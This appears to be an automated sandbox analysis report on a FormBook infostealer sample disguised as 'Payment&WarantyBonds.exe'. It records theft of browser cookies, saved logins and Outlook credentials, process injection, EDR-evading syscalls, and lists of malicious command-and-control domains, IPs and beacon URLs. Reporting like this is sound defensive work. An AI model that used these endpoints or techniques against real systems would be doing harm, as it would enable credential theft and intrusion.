Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\systeminfo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\systeminfo.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545186 Sample: Payment&WarantyBonds.bat Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 31 www.xipowerplay.xyz 2->31 33 www.091210.xyz 2->33 35 17 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 5 other signatures 2->53 10 Payment&WarantyBonds.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 29 C:\Users\...\Payment&WarantyBonds.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 Payment&WarantyBonds.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 oDnyHukDVUZk.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 systeminfo.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 oDnyHukDVUZk.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.cotti.club 103.120.80.111, 49794, 49810, 49826 WEST263GO-HKWest263InternationalLimitedHK Hong Kong 23->37 39 www.simplek.top 203.161.49.193, 50036, 50037, 50038 VNPT-AS-VNVNPTCorpVN Malaysia 23->39 41 12 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.154.67
 www.091210.xyz United States
13335 CLOUDFLARENETUS true
13.248.169.48
 www.xipowerplay.xyz United States
16509 AMAZON-02US true
20.2.249.7
 www.adsa6c.top United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS true
144.76.190.39
 basicreviews.online Germany
24940 HETZNER-ASDE true
199.59.243.227
 www.297676.com United States
395082 BODIS-NJUS true
217.160.0.60
 solarand.online Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
198.251.84.200
 stationseek.online United States
53667 PONYNETUS true
161.97.142.144
 www.030002059.xyz United States
51167 CONTABODE true
203.161.49.193
 www.simplek.top Malaysia
45899 VNPT-AS-VNVNPTCorpVN true
103.120.80.111
 www.cotti.club Hong Kong
139021 WEST263GO-HKWest263InternationalLimitedHK true
34.92.128.59
 www.sgland06.online United States
15169 GOOGLEUS false
3.33.130.190
 iampinky.info United States
8987 AMAZONEXPANSIONGB true
152.42.255.48
 extrime1.shop United States
81 NCRENUS true
217.76.156.252
 www.cesach.net Spain
8560 ONEANDONE-ASBrauerstrasse48DE true

Contacted Domains

Name IP Active
www.cotti.club 103.120.80.111 true
www.sgland06.online 34.92.128.59 true
solarand.online 217.160.0.60 true
www.simplek.top 203.161.49.193 true
extrime1.shop 152.42.255.48 true
www.cesach.net 217.76.156.252 true
basicreviews.online 144.76.190.39 true
www.091210.xyz 172.67.154.67 true
www.adsa6c.top 20.2.249.7 true
www.297676.com 199.59.243.227 true
www.xipowerplay.xyz 13.248.169.48 true
www.030002059.xyz 161.97.142.144 true
iampinky.info 3.33.130.190 true
stationseek.online 198.251.84.200 true
www.solarand.online unknown unknown
www.extrime1.shop unknown unknown
www.stationseek.online unknown unknown
www.iampinky.info unknown unknown
www.basicreviews.online unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.030002059.xyz/2sun/?ZT=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&mTkD=Gj2Ti2T0g4 true
    		unknown
    http://www.extrime1.shop/jr4j/ true
      		unknown
      http://www.xipowerplay.xyz/akxn/ true
        		unknown
        http://www.xipowerplay.xyz/akxn/?ZT=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks=&mTkD=Gj2Ti2T0g4 true
          		unknown
          http://www.091210.xyz/jwed/ true
            		unknown
            http://www.adsa6c.top/wr26/ true
              		unknown
              http://www.cotti.club/3ej6/?ZT=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&mTkD=Gj2Ti2T0g4 true
                		unknown
                http://www.sgland06.online/33ib/?ZT=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI=&mTkD=Gj2Ti2T0g4 false
                  		unknown
                  http://www.cotti.club/3ej6/ true
                    		unknown
                    http://www.030002059.xyz/2sun/ true
                      		unknown
                      http://www.cesach.net/dma3/?mTkD=Gj2Ti2T0g4&ZT=IhPPRAmDChEnx8G5Mk3wYKJVvliqClSy7lT3/i9hniKwN2WP3nmtzIAyaYX2MoR3jQRU/NaT7iTCvd3O/fPSuEFMVnQWNGAOAVxjgpJaGw2AUh+P10Czoew= true
                        		unknown
                        http://www.basicreviews.online/3xn5/ true
                          		unknown
                          http://www.solarand.online/diem/?mTkD=Gj2Ti2T0g4&ZT=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg= true
                            		unknown
                            http://www.091210.xyz/jwed/?ZT=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c=&mTkD=Gj2Ti2T0g4 true
                              		unknown
                              http://www.297676.com/xyex/ true
                                		unknown
                                http://www.iampinky.info/nhtq/?ZT=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&mTkD=Gj2Ti2T0g4 true
                                  		unknown
                                  http://www.solarand.online/diem/ true
                                    		unknown
                                    http://www.sgland06.online/33ib/ false
                                      		unknown
                                      http://www.basicreviews.online/3xn5/?ZT=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&mTkD=Gj2Ti2T0g4 true
                                        		unknown
                                        http://www.adsa6c.top/wr26/?ZT=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&mTkD=Gj2Ti2T0g4 true
                                          		unknown
                                          http://www.stationseek.online/wd23/ true
                                            		unknown
                                            http://www.297676.com/xyex/?ZT=GRv8gXQeeb2Gl8ts68dy26JEIDOFTPQDU1Y3CPEivIL54q3aRuVfXNser16Tn8T/OBl4IICKxXKXWQiZ2Uzn7HwRtVNzQ2FbKXtno3vR39Y/zqEhWKkV0ww=&mTkD=Gj2Ti2T0g4 true
                                              		unknown
                                              http://www.stationseek.online/wd23/?ZT=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&mTkD=Gj2Ti2T0g4 true
                                                		unknown
                                                http://www.cesach.net/dma3/ true
                                                  		unknown
                                                  http://www.simplek.top/ep69/?ZT=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&mTkD=Gj2Ti2T0g4 true
                                                    		unknown
                                                    http://www.simplek.top/ep69/ true
                                                      		unknown